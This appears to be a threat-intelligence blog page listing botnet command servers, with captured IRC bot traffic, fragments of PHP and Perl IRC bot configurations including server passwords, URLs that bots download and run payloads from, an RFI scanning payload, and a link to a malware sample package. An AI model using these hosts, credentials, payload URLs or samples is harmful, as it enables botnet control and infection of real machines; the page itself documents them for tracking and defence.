Author: Pig

dns.photomarket.me(ngr bot hosted in Latvia Workstone Corporation)

Uncategorized

Remote Host Port Number 194.247.48.62 1234 PASS priv9 213.251.170.52 80 64.62.181.43 80 66.197.139.152 80 PRIVMSG #ngr :[Ruskill]: Removing “C:WINDOWSsystem32drwtsn32.exe” at reboot PRIVMSG #ngr :[d=”http://datapimp.fileave.com/setup1.exe” s=”129024 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” NICK n{US|XP}rdhulwp USER rdhulwp 0 0 :rdhulwp JOIN #ngr HELO PRIVMSG #ngr :[d=”http://mediamarkinc.in/install.52145.exe” s=”73728 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” PRIVMSG #ngrRead more...

88.198.64.134(botnet hosted in Germany Network Address For Servers)

Uncategorized

88.198.64.134:2345 Nick: New[AUT|00|P|37328] Username: XP-7319 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://redir.ec/images2313?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|37328]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/88.198.64.134

14 mb malware samples

Uncategorized

here another package with diferent malware samples ii.exe is the bot exe from snk our ruski hecker Download: http://c5be3f78.whackyvidz.com

91.121.96.162(botnet hosted in France Paris Ovh Sas)

Uncategorized

Remote Host Port Number 91.121.96.162 5540 MODE pLagUe{USA}50784 -ix JOIN #drako MODE #drako -ix PONG irc2.accesox.net PRIVMSG #drako : Hola Amos. PONG A99D4269 JOIN ##verga## MODE ##verga## -ix PONG f2.accesox.net MODE pLagUe{USA}55216 -ix PRIVMSG ##verga## : NueVo PuTo InfeCcIoN. infos about hosting: http://whois.domaintools.com/91.121.96.162

onlinedatingsecretfriends.com(malware hosted in United States Austin Road Runner Holdco Llc)

Uncategorized

onlinedatingsecretfriends.com 97.79.238.39 127.0.0.1 127.0.0.1 onemouseklick.com 96.9.186.133 zonetf.com 96.9.169.85 freecdvideo.com 66.199.251.242 www.google.com 209.85.149.105 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55192 Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80 Outgoing connection to remote server: freecdvideo.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: zonetf.com TCPRead more...

h18811652163.rev.rootvps.pl(botnet hosted in Poland Www.hitme.net.pl)

Uncategorized

linux bots inside var $config = array(“server”=>”188.116.52.163”, “port”=>”31336”, “pass”=>”haslo”, “prefix”=>”php”, “maxrand”=>”3”, “chan”=>”#php”, “chan2″=>”#php”, “key”=>””, “modes”=>”+ps”, “password”=>”haslo”, infos about hosting: http://whois.domaintools.com/188.116.52.163

server.gasbian.com(botnet hosted in United States Chicago Hostforweb Inc)

Uncategorized

205.234.145.229:2345 Nick: New[AUT|00|P|35974] Username: XP-3032 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://ibe.am/images004?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|35974]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/205.234.145.229

phython.no-ip.biz(botnet hosted in Korea, Republic Of Seoul Hanaro Telecom Inc)

Uncategorized

Linux bots here from egyptian hecker my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “phython.no-ip.biz”; my $ircport = “7000”; my $nickname = “BR[“.int(rand(100)).”]”; my $ident = “Bra”; my $channel = “#help”; my $admin = “Bjes”; scaning actions Now talking in #help Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ] Topic By: [ Subali ] ModesRead more...